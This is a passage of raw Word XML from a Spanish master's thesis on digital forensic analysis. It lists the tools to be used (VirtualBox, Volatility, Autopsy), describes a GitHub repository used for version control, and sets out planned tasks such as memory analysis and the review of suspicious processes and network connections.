        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.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E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o Sleuth Kit). No obstante, la selección y configuración de estas herramientas incurren en una deuda técnica que debe ser minuciosamente administrada, asegurando la pertinencia, licencia y compatibilidad de </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>estas</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBBC45" w14:textId="675CF3DE" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo al ordenador personal </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>quiero destacar</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> las siguientes aplicaciones que se van a utilizar para la realización del análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61E33F" w14:textId="67FA23CD" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57C41F" w14:textId="3AE11547" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Volatility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0BCA1A" w14:textId="2CB972F1" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31155AB9" w14:textId="5B107A2B" w:rsidR="00E82E18" w:rsidRPr="009440E4" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por otro lado, la documentación y redacción del TFM se consolida mediante el uso del repositorio en </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub</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GitHub: Plataforma de desarrollo colaborativo para alojar proyectos utilizando el sistema de control de versiones Git."</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 xml:space="preserve"> TFM-ANÁLISIS-FORENSE (https://github.com/jrodg85/TFM-ANALISIS-FORENSE). Este repositorio no solo sirve como medio para documentar y presentar los hallazgos y metodologías empleadas, sino que también se erige como una herramienta para gestionar versiones y cambios a lo largo del desarrollo del trabajo, facilitando la trazabilidad y coherencia </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Se deben establecer estrategias robustas para garantizar la integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> y confidencialidad de la información almacenada, considerando la naturaleza sensible de los datos manejados en la investigación forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F4B34" w14:textId="58F6FCB8" w:rsidR="00D504A6" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finalmente, Internet emerge como un recurso invaluable para la investigación, actualización y comunicación a lo largo del proyecto. Navegar por la red debe ser realizado de forma segura y consciente, protegiendo las comunicaciones y asegurando la integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> de las herramientas y datos descargados</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6E199D" w14:textId="77777777" w:rsidR="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3B10A5" w14:textId="38BA1F32" w:rsidR="00D504A6" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc155782500"/>
      <w:r w:rsidRPr="00E82E18">
        <w:t>1.5.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:t>Listado de tareas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7956789E" w14:textId="77777777" w:rsidR="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255EBBEF" w14:textId="77777777" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En esta sección se ha elaborado después de una planificación del trabajo, el cual se han designado el siguiente listado de tareas a realizar. Gracias a este listado, podemos organizar el cómo vamos a realizar el TFM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDA874" w14:textId="62A9ADC5" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="005F4CA6" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hay que destacar</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante el listado de las tareas, cabe mencionar que </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>habrá</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tareas de grooming o refinamiento, ellas no son utilizadas para reducción de deuda técnica, el objetivo estas jornadas es reflexionar sobre el contenido </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y valorar posibilidad de mejorar la organización </w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Estas variaciones, gracias a que se está realizando un control de versiones con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>it, se podrán ver las evoluciones o cambios del TFM en el mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB9F5A" w14:textId="77777777" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Durante la elaboración del reto 1 (PEC 1), se realizarán las siguientes tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E718746" w14:textId="30D79947" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lectura enunciado actividad 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F536F" w14:textId="3E222D67" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="005F4CA6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Decisión</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de formato de TFM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68109C58" w14:textId="428E2C46" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maquetación de TFM en LaTeX</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>LaTeX: Sistema de composición de textos, ampliamente utilizado para la producción de documentos científicos y matemáticos.</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E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604ABFB2" w14:textId="796C7151" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elaboración de índice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA906CD" w14:textId="68F5C993" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento de TFM 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576B8F8" w14:textId="72178D44" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Diagrama de Gantt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2DB68" w14:textId="19FC2722" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="005F4CA6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Problema por resolver</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C81267" w14:textId="0CE31186" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Objetivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676C94A" w14:textId="44C031C6" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Revisión del estado del arte de la informática forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26150DDA" w14:textId="3B154E3B" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento de TFM 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B40EB" w14:textId="77777777" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Durante la elaboración del reto 2 (PEC 2), se realizarán las siguientes tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D3E8C" w14:textId="3C711194" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lectura enunciado actividad 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10957527" w14:textId="3439D7DC" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extremos de análisis y previsión de pruebas: Introducción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC090C" w14:textId="287637C3" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extremos de análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3EDD2" w14:textId="65219439" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Previsión de pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B770AD" w14:textId="580A8ED6" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis de la memoria 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E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Introducción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A5917" w14:textId="2BF1B433" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Acciones previas al análisis de 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E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8A2B1" w14:textId="75C490AD" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Búsqueda de procesos en funcionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB64A40" w14:textId="55CF4F42" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis y extracción de procesos sospechosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B4CF2" w14:textId="2A30D72B" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Listado de conexiones de red y conexiones sospechosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3B5A2" w14:textId="498C92E3" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento TFM 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBD9E6" w14:textId="511AA525" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Feedback de la PEC 01.</w:t>
      </w:r>
    </w:p>
